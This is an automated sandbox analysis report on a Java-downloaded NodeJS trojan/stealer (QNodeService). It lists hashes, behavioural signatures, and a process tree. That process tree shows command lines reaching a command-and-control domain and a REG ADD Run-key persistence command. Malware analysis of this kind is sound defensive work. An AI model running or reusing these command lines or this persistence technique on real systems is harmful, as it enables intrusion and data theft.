Analysis

Max time kernel: 119s
Max time network: 150s
Platform: windows10_x64
Resource: win10v20201028
Submitted: 05-11-2020 15:32

Static task: static1

Behavioral task: behavioral1
  Sample: Ordine Novembre.jar
  Resource: win7v20201028 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: Ordine Novembre.jar
  Resource: win10v20201028 (windows10_x64)
  0 signatures, 0 seconds
General

Target: Ordine Novembre.jar
Size: 100KB
MD5: d3beaa3255348f63f93e0188f6e12312
SHA1: dba05de62887edcc29c0dbf0cbc84b1aadc80e99
SHA256: 79b800668faba140b33637f63aa00bdb22773b4ddccb1b70a21e7d259d7b0ea4
SHA512: a5a76bdb75efc43c86548c0bf103a2db614cc4b513ecdacdc308273f09cee113511f27fd2fb5fd94bb66119c9ecf3e09445eb0b6d7f36b00cc0c09c5d776b65e
Score: 10/10
Malware Config

Signatures

QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
  PID   Process
  1360  node.exe
  3308  node.exe
  2824  node.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
  Description      IoC  Process
  Key created      \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\fa76a2a6-c5e8-436f-bf84-6c274a87301c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""  reg.exe

JavaScript code in executable (3 IoCs)
  Resource                                    YARA rule
  behavioral2/files/0x000100000001ab77-174.dat  js
  behavioral2/files/0x000100000001ab77-177.dat  js
  behavioral2/files/0x000100000001ab77-181.dat  js

Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow  IoC
  21    wtfismyip.com
  22    wtfismyip.com

Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Description        IoC  Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1  node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz  node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
  PID   Process
  1360  node.exe
  1360  node.exe
  1360  node.exe
  1360  node.exe
  3308  node.exe
  3308  node.exe
  3308  node.exe
  3308  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe
  2824  node.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  Description                        PID   Process    procid_target
  PID 492 wrote to memory of 3644    492   java.exe   76
  PID 492 wrote to memory of 3644    492   java.exe   76
  PID 3644 wrote to memory of 1360   3644  javaw.exe  80
  PID 3644 wrote to memory of 1360   3644  javaw.exe  80
  PID 1360 wrote to memory of 3308   1360  node.exe   82
  PID 1360 wrote to memory of 3308   1360  node.exe   82
  PID 3308 wrote to memory of 2824   3308  node.exe   83
  PID 3308 wrote to memory of 2824   3308  node.exe   83
  PID 2824 wrote to memory of 2104   2824  node.exe   85
  PID 2824 wrote to memory of 2104   2824  node.exe   85
  PID 2104 wrote to memory of 3096   2104  cmd.exe    86
  PID 2104 wrote to memory of 3096   2104  cmd.exe    86
Processes (process tree, indented by depth)

1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Ordine Novembre.jar"
   PID: 492
   - Suspicious use of WriteProcessMemory

  2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
     Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e1db5d24.tmp
     PID: 3644
     - Suspicious use of WriteProcessMemory

    3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
       Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ciko77.hopto.org
       PID: 1360
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory

      4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2gfXXt\boot.js --hub-domain ciko77.hopto.org
         PID: 3308
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

        5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2gfXXt\boot.js --hub-domain ciko77.hopto.org
           PID: 2824
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory

          6. C:\Windows\system32\cmd.exe
             Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fa76a2a6-c5e8-436f-bf84-6c274a87301c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             PID: 2104
             - Suspicious use of WriteProcessMemory

            7. C:\Windows\system32\reg.exe
               Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fa76a2a6-c5e8-436f-bf84-6c274a87301c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               PID: 3096
               - Adds Run key to start application